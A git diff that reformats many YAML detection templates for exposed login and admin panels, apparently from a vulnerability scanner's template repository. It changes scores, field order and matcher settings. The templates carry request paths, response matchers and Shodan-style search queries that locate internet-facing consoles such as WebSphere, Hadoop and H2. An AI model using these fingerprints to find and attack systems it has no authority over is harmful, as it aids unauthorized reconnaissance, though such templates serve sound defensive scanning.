+ cvss-score: 0 cwe-id: CWE-200 - tags: panel,gradle,cache metadata: max-request: 1 + tags: panel,gradle,cache http: - method: GET diff --git a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml index 45545b3e30..8e314fd7c5 100644 --- a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml +++ b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml @@ -7,11 +7,11 @@ info: description: Gradle Enterprise logjn panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,gradle metadata: max-request: 1 + tags: panel,gradle http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/grafana-detect.yaml b/http/exposed-panels/grafana-detect.yaml index b150126565..1bc521bff6 100644 --- a/http/exposed-panels/grafana-detect.yaml +++ b/http/exposed-panels/grafana-detect.yaml @@ -7,13 +7,13 @@ info: description: Grafana login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 - shodan-query: title:"Grafana" vendor: grafana product: grafana + shodan-query: title:"Grafana" category: devops tags: panel,grafana,detect diff --git a/http/exposed-panels/grails-database-admin-console.yaml b/http/exposed-panels/grails-database-admin-console.yaml index 92a78ff8cf..e91c092148 100644 --- a/http/exposed-panels/grails-database-admin-console.yaml +++ b/http/exposed-panels/grails-database-admin-console.yaml @@ -5,16 +5,16 @@ info: author: emadshanab severity: medium description: Grails Admin Console panel was detected. + reference: + - https://www.acunetix.com/vulnerabilities/web/grails-database-console/ + - http://h2database.com/html/quickstart.html#h2_console classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://www.acunetix.com/vulnerabilities/web/grails-database-console/ - - http://h2database.com/html/quickstart.html#h2_console - tags: grails,panel metadata: max-request: 2 + tags: grails,panel http: - method: GET diff --git a/http/exposed-panels/graphite-browser.yaml b/http/exposed-panels/graphite-browser.yaml index 33d27e44a7..9dd02e80dd 100644 --- a/http/exposed-panels/graphite-browser.yaml +++ b/http/exposed-panels/graphite-browser.yaml @@ -9,7 +9,7 @@ info: - https://graphiteapp.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/greenbone-panel.yaml b/http/exposed-panels/greenbone-panel.yaml index 5ec1023eb9..0d02cebc6e 100644 --- a/http/exposed-panels/greenbone-panel.yaml +++ b/http/exposed-panels/greenbone-panel.yaml @@ -7,10 +7,10 @@ info: description: | Greenbone Security Assistant Web Panel is detected metadata: - max-request: 1 verified: true - zoomeye-query: title:"Greenbone Security Assistant" + max-request: 1 shodan-query: http.title:"Greenbone Security Assistant" + zoomeye-query: title:"Greenbone Security Assistant" tags: panel,greenbone,login http: diff --git a/http/exposed-panels/group-ib-panel.yaml b/http/exposed-panels/group-ib-panel.yaml index 8f6a783b18..b0fd54d72f 100644 --- a/http/exposed-panels/group-ib-panel.yaml +++ b/http/exposed-panels/group-ib-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.facebook.com/photo/?fbid=566951735475350&set=a.467014098802448 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Group-IB Managed XDR" tags: panel,groupib diff --git a/http/exposed-panels/gryphon-login.yaml b/http/exposed-panels/gryphon-login.yaml index 0971db1172..d91b0ebdf5 100644 --- a/http/exposed-panels/gryphon-login.yaml +++ b/http/exposed-panels/gryphon-login.yaml @@ -7,7 +7,7 @@ info: description: Gryphon router panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/gyra-master-admin.yaml b/http/exposed-panels/gyra-master-admin.yaml index 20fc8e806e..e9585689e3 100644 --- a/http/exposed-panels/gyra-master-admin.yaml +++ b/http/exposed-panels/gyra-master-admin.yaml @@ -7,11 +7,11 @@ info: description: GYRA Master Admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login | GYRA Master Admin" tags: panel,master,admin,gyra diff --git a/http/exposed-panels/h2console-panel.yaml b/http/exposed-panels/h2console-panel.yaml index b7654dc9d8..ae1e66f61b 100644 --- a/http/exposed-panels/h2console-panel.yaml +++ b/http/exposed-panels/h2console-panel.yaml @@ -10,7 +10,7 @@ info: - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,7 +23,6 @@ http: - '{{BaseURL}}/h2-console/login.jsp' matchers: - - type: dsl dsl: - "status_code==200" diff --git a/http/exposed-panels/hadoop-exposure.yaml b/http/exposed-panels/hadoop-exposure.yaml index 44ff4e9d2c..6024bd45b3 100644 --- a/http/exposed-panels/hadoop-exposure.yaml +++ b/http/exposed-panels/hadoop-exposure.yaml @@ -7,16 +7,17 @@ info: description: Apache Hadoop panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,apache,hadoop metadata: max-request: 1 + tags: panel,apache,hadoop http: - method: GET path: - '{{BaseURL}}/dfshealth.html' + matchers: - type: word words: diff --git a/http/exposed-panels/hangfire-dashboard.yaml b/http/exposed-panels/hangfire-dashboard.yaml index a305960084..c4c95934fe 100644 --- a/http/exposed-panels/hangfire-dashboard.yaml +++ b/http/exposed-panels/hangfire-dashboard.yaml @@ -7,11 +7,11 @@ info: description: Hangfire Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Overview – Hangfire Dashboard" tags: panel,hangfire @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/hangfire" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/harbor-panel.yaml b/http/exposed-panels/harbor-panel.yaml index 258a2cf3fd..2eeb0bab50 100644 --- a/http/exposed-panels/harbor-panel.yaml +++ b/http/exposed-panels/harbor-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/goharbor/harbor classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:657337228 tags: panel,harbor diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index 6b3b36292b..eee3ff4c49 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -7,11 +7,11 @@ info: description: Hashicorp Consul Agent was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,consul,api,panel metadata: max-request: 1 + tags: tech,consul,api,panel http: - method: GET diff --git a/http/exposed-panels/hashicorp-consul-webgui.yaml b/http/exposed-panels/hashicorp-consul-webgui.yaml index a8f07fa6cd..fd6dc121d3 100644 --- a/http/exposed-panels/hashicorp-consul-webgui.yaml +++ b/http/exposed-panels/hashicorp-consul-webgui.yaml @@ -7,7 +7,7 @@ info: description: HashiCorp Consul Web UI login panel was detected, classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/hestia-panel.yaml b/http/exposed-panels/hestia-panel.yaml index 36474f486f..8304f67dcd 100644 --- a/http/exposed-panels/hestia-panel.yaml +++ b/http/exposed-panels/hestia-panel.yaml @@ -9,11 +9,11 @@ info: - https://hestiacp.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Hestia Control Panel" tags: panel,hestia,detect diff --git a/http/exposed-panels/highmail-admin-panel.yaml b/http/exposed-panels/highmail-admin-panel.yaml index 104a2cc38f..64316a0e19 100644 --- a/http/exposed-panels/highmail-admin-panel.yaml +++ b/http/exposed-panels/highmail-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: HighMail admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"HighMail" fofa-query: title="HighMail" tags: highmail,panel @@ -25,9 +25,9 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "HighMail" diff --git a/http/exposed-panels/hitron-technologies.yaml b/http/exposed-panels/hitron-technologies.yaml index 228192b698..0443ef381e 100644 --- a/http/exposed-panels/hitron-technologies.yaml +++ b/http/exposed-panels/hitron-technologies.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7062 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb,router metadata: max-request: 1 + tags: panel,edb,router http: - method: GET diff --git a/http/exposed-panels/hivemanager-login-panel.yaml b/http/exposed-panels/hivemanager-login-panel.yaml index c10d325ab8..abd6c6e6d3 100644 --- a/http/exposed-panels/hivemanager-login-panel.yaml +++ b/http/exposed-panels/hivemanager-login-panel.yaml @@ -7,11 +7,11 @@ info: description: HiveManager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:1604363273 tags: panel,hivemanager,aerohive diff --git a/http/exposed-panels/hmc-hybris-panel.yaml b/http/exposed-panels/hmc-hybris-panel.yaml index 342a1b8cd5..4b21fd083d 100644 --- a/http/exposed-panels/hmc-hybris-panel.yaml +++ b/http/exposed-panels/hmc-hybris-panel.yaml @@ -3,15 +3,15 @@ id: hmc-hybris-panel info: name: Hybris Management Console Login Panel - Detect author: dogasantos - description: Hybris Management Console login panel was detected. severity: info + description: Hybris Management Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sap metadata: max-request: 2 + tags: panel,sap http: - method: GET diff --git a/http/exposed-panels/home-assistant-panel.yaml b/http/exposed-panels/home-assistant-panel.yaml index f4324ccb06..581bbe6b60 100644 --- a/http/exposed-panels/home-assistant-panel.yaml +++ b/http/exposed-panels/home-assistant-panel.yaml @@ -7,11 +7,11 @@ info: reference: https://www.home-assistant.io/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Home Assistant" tags: panel,iot,homeassistant diff --git a/http/exposed-panels/homematic-panel.yaml b/http/exposed-panels/homematic-panel.yaml index 4c38f38947..cd7ef69ff4 100644 --- a/http/exposed-panels/homematic-panel.yaml +++ b/http/exposed-panels/homematic-panel.yaml @@ -7,7 +7,7 @@ info: description: Homematic panel was deetcted. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/honeywell-web-controller.yaml b/http/exposed-panels/honeywell-web-controller.yaml index 9ebfd1ae73..c9f2ca799b 100644 --- a/http/exposed-panels/honeywell-web-controller.yaml +++ b/http/exposed-panels/honeywell-web-controller.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7130 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel metadata: max-request: 1 + tags: edb,panel http: - method: GET diff --git a/http/exposed-panels/honeywell-xl-web-controller.yaml b/http/exposed-panels/honeywell-xl-web-controller.yaml index 5d152c7089..cdd16bf450 100644 --- a/http/exposed-panels/honeywell-xl-web-controller.yaml +++ b/http/exposed-panels/honeywell-xl-web-controller.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7130 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Honeywell XL Web Controller" tags: panel,honeywell,edb diff --git a/http/exposed-panels/horde-login-panel.yaml b/http/exposed-panels/horde-login-panel.yaml index bd8277bcc5..254015bcde 100644 --- a/http/exposed-panels/horde-login-panel.yaml +++ b/http/exposed-panels/horde-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Horde login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:-741491222 tags: horde,panel @@ -22,9 +22,9 @@ http: - "{{BaseURL}}/login.php" stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "HordeLogin.user" diff --git a/http/exposed-panels/horde-webmail-login.yaml b/http/exposed-panels/horde-webmail-login.yaml index 730f4167be..70c93e7c6e 100644 --- a/http/exposed-panels/horde-webmail-login.yaml +++ b/http/exposed-panels/horde-webmail-login.yaml @@ -7,11 +7,11 @@ info: description: Horde Webmail login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:2104916232 tags: horde,webmail,panel @@ -22,9 +22,9 @@ http: - "{{BaseURL}}/imp/login.php" stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "Welcome to Horde" diff --git a/http/exposed-panels/hospital-management-panel.yaml b/http/exposed-panels/hospital-management-panel.yaml index 6bfb4cb0fb..d470cb5648 100644 --- a/http/exposed-panels/hospital-management-panel.yaml +++ b/http/exposed-panels/hospital-management-panel.yaml @@ -7,11 +7,11 @@ info: description: Hospital Management System login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Hospital Management System" tags: panel,hms,cms diff --git a/http/exposed-panels/hp-ilo-5.yaml b/http/exposed-panels/hp-ilo-5.yaml index e0428e11c6..d4667c759f 100644 --- a/http/exposed-panels/hp-ilo-5.yaml +++ b/http/exposed-panels/hp-ilo-5.yaml @@ -9,11 +9,11 @@ info: - https://www.hpe.com/us/en/servers/integrated-lights-out-ilo.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: hp,ilo,panel metadata: max-request: 1 + tags: hp,ilo,panel http: - method: GET diff --git a/http/exposed-panels/hp-service-manager.yaml b/http/exposed-panels/hp-service-manager.yaml index 75ccbd2035..f335395e89 100644 --- a/http/exposed-panels/hp-service-manager.yaml +++ b/http/exposed-panels/hp-service-manager.yaml @@ -7,7 +7,7 @@ info: description: HP Service Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -25,6 +25,7 @@ http: - type: regex regex: - '(?m)HP Service Manager(.*)<\/title>' + - type: status status: - 200 diff --git a/http/exposed-panels/hp-virtual-connect-manager.yaml b/http/exposed-panels/hp-virtual-connect-manager.yaml index be530a6d3d..c49cd4e045 100644 --- a/http/exposed-panels/hp-virtual-connect-manager.yaml +++ b/http/exposed-panels/hp-virtual-connect-manager.yaml @@ -7,7 +7,7 @@ info: description: HP Virtual Connect Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/hpe-system-management-login.yaml b/http/exposed-panels/hpe-system-management-login.yaml index c50b94a599..cc2031d97f 100644 --- a/http/exposed-panels/hpe-system-management-login.yaml +++ b/http/exposed-panels/hpe-system-management-login.yaml @@ -7,11 +7,11 @@ info: description: Hewlett Packard Enterprise System Management login page was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: hpe,tech,panel metadata: max-request: 1 + tags: hpe,tech,panel http: - method: GET diff --git a/http/exposed-panels/httpbin-panel.yaml b/http/exposed-panels/httpbin-panel.yaml index 8463b6efd2..437856b626 100644 --- a/http/exposed-panels/httpbin-panel.yaml +++ b/http/exposed-panels/httpbin-panel.yaml @@ -9,7 +9,7 @@ info: - https://github.com/postmanlabs/httpbin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/huawei-hg532e-panel.yaml b/http/exposed-panels/huawei-hg532e-panel.yaml index 55910d2076..2d6e5d2299 100644 --- a/http/exposed-panels/huawei-hg532e-panel.yaml +++ b/http/exposed-panels/huawei-hg532e-panel.yaml @@ -10,7 +10,7 @@ info: - https://www.192-168-1-1-ip.co/router/huawei/hg532e/2186/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/hybris-administration-console.yaml b/http/exposed-panels/hybris-administration-console.yaml index c1061ef3ad..50b7235669 100644 --- a/http/exposed-panels/hybris-administration-console.yaml +++ b/http/exposed-panels/hybris-administration-console.yaml @@ -7,11 +7,11 @@ info: description: Hybris Administration Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Hybris" tags: panel,hybris @@ -22,9 +22,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/hydra-dashboard.yaml b/http/exposed-panels/hydra-dashboard.yaml index 798ce28cc2..67aba2155e 100644 --- a/http/exposed-panels/hydra-dashboard.yaml +++ b/http/exposed-panels/hydra-dashboard.yaml @@ -7,11 +7,11 @@ info: description: Hydra router dashboard was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Hydra Router Dashboard" tags: panel,exposure,hydra diff --git a/http/exposed-panels/hypertest-dashboard.yaml b/http/exposed-panels/hypertest-dashboard.yaml index dab1edbdd4..18d71788fb 100644 --- a/http/exposed-panels/hypertest-dashboard.yaml +++ b/http/exposed-panels/hypertest-dashboard.yaml @@ -10,11 +10,11 @@ info: - https://www.hypertest.co classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"HyperTest" tags: panel,exposure,hypertest diff --git a/http/exposed-panels/i-mscp-panel.yaml b/http/exposed-panels/i-mscp-panel.yaml index 0e26dbd8c3..044fb17fc4 100644 --- a/http/exposed-panels/i-mscp-panel.yaml +++ b/http/exposed-panels/i-mscp-panel.yaml @@ -9,11 +9,11 @@ info: - https://i-mscp.net/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"i-MSCP - Multi Server Control Panel" tags: panel,i-mscp,detect diff --git a/http/exposed-panels/ibm-openadmin-panel.yaml b/http/exposed-panels/ibm-openadmin-panel.yaml index 51c191d76b..9b77c80daa 100644 --- a/http/exposed-panels/ibm-openadmin-panel.yaml +++ b/http/exposed-panels/ibm-openadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: "true" max-request: 1 shodan-query: http.favicon.hash:965982073 - verified: "true" tags: openadmin,login,panel http: diff --git a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml index c432043f91..03b0cbf1d5 100644 --- a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml +++ b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml @@ -7,7 +7,7 @@ info: description: IBM Advanced System Management panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index f33514202b..e6873a3bfe 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -9,11 +9,11 @@ info: - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-399298961 tags: maximo,panel,ibm @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml index 18d6c4d18b..66cdf6ea6e 100644 --- a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml +++ b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml @@ -9,11 +9,11 @@ info: - https://www.ibm.com/docs/en/ibm-mq/9.0?topic=console-getting-started-mq classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,ibm metadata: max-request: 1 + tags: panel,ibm http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - '<title>MQ Console' + - type: status status: - 200 diff --git a/http/exposed-panels/ibm/ibm-note-login.yaml b/http/exposed-panels/ibm/ibm-note-login.yaml index 8cd4bde3f4..e116b1f269 100644 --- a/http/exposed-panels/ibm/ibm-note-login.yaml +++ b/http/exposed-panels/ibm/ibm-note-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7122 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: ibm,edb,panel metadata: max-request: 2 + tags: ibm,edb,panel http: - method: GET @@ -26,6 +26,7 @@ http: - type: word words: - 'IBM iNotes Login' + - type: status status: - 200 diff --git a/http/exposed-panels/ibm/ibm-security-access-manager.yaml b/http/exposed-panels/ibm/ibm-security-access-manager.yaml index b3a46e76f9..5839e081d5 100644 --- a/http/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/http/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -9,11 +9,11 @@ info: - https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,ibm metadata: max-request: 1 + tags: panel,ibm http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-service-assistant.yaml b/http/exposed-panels/ibm/ibm-service-assistant.yaml index 30a956fd59..d92eb6d0b2 100644 --- a/http/exposed-panels/ibm/ibm-service-assistant.yaml +++ b/http/exposed-panels/ibm/ibm-service-assistant.yaml @@ -7,7 +7,7 @@ info: description: IBM Service Assistant login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml index ff3db78e2b..d5ae660cfd 100644 --- a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:1337147129 tags: websphere,panel,ibm @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ibm/ibm-websphere-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-panel.yaml index 372d1b6c99..b86a8c7e61 100644 --- a/http/exposed-panels/ibm/ibm-websphere-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-panel.yaml @@ -7,7 +7,7 @@ info: description: IBM WebSphere Portal login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,9 +21,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: status status: - 200 diff --git a/http/exposed-panels/icc-pro-login.yaml b/http/exposed-panels/icc-pro-login.yaml index d52ebb4e14..b1d046e26a 100644 --- a/http/exposed-panels/icc-pro-login.yaml +++ b/http/exposed-panels/icc-pro-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7980 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login to ICC PRO system" tags: panel,icc-pro,edb diff --git a/http/exposed-panels/icewarp-panel-detect.yaml b/http/exposed-panels/icewarp-panel-detect.yaml index eebeaae022..fe6ab074ac 100644 --- a/http/exposed-panels/icewarp-panel-detect.yaml +++ b/http/exposed-panels/icewarp-panel-detect.yaml @@ -7,11 +7,11 @@ info: description: IceWarp login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"icewarp" tags: icewarp,panel @@ 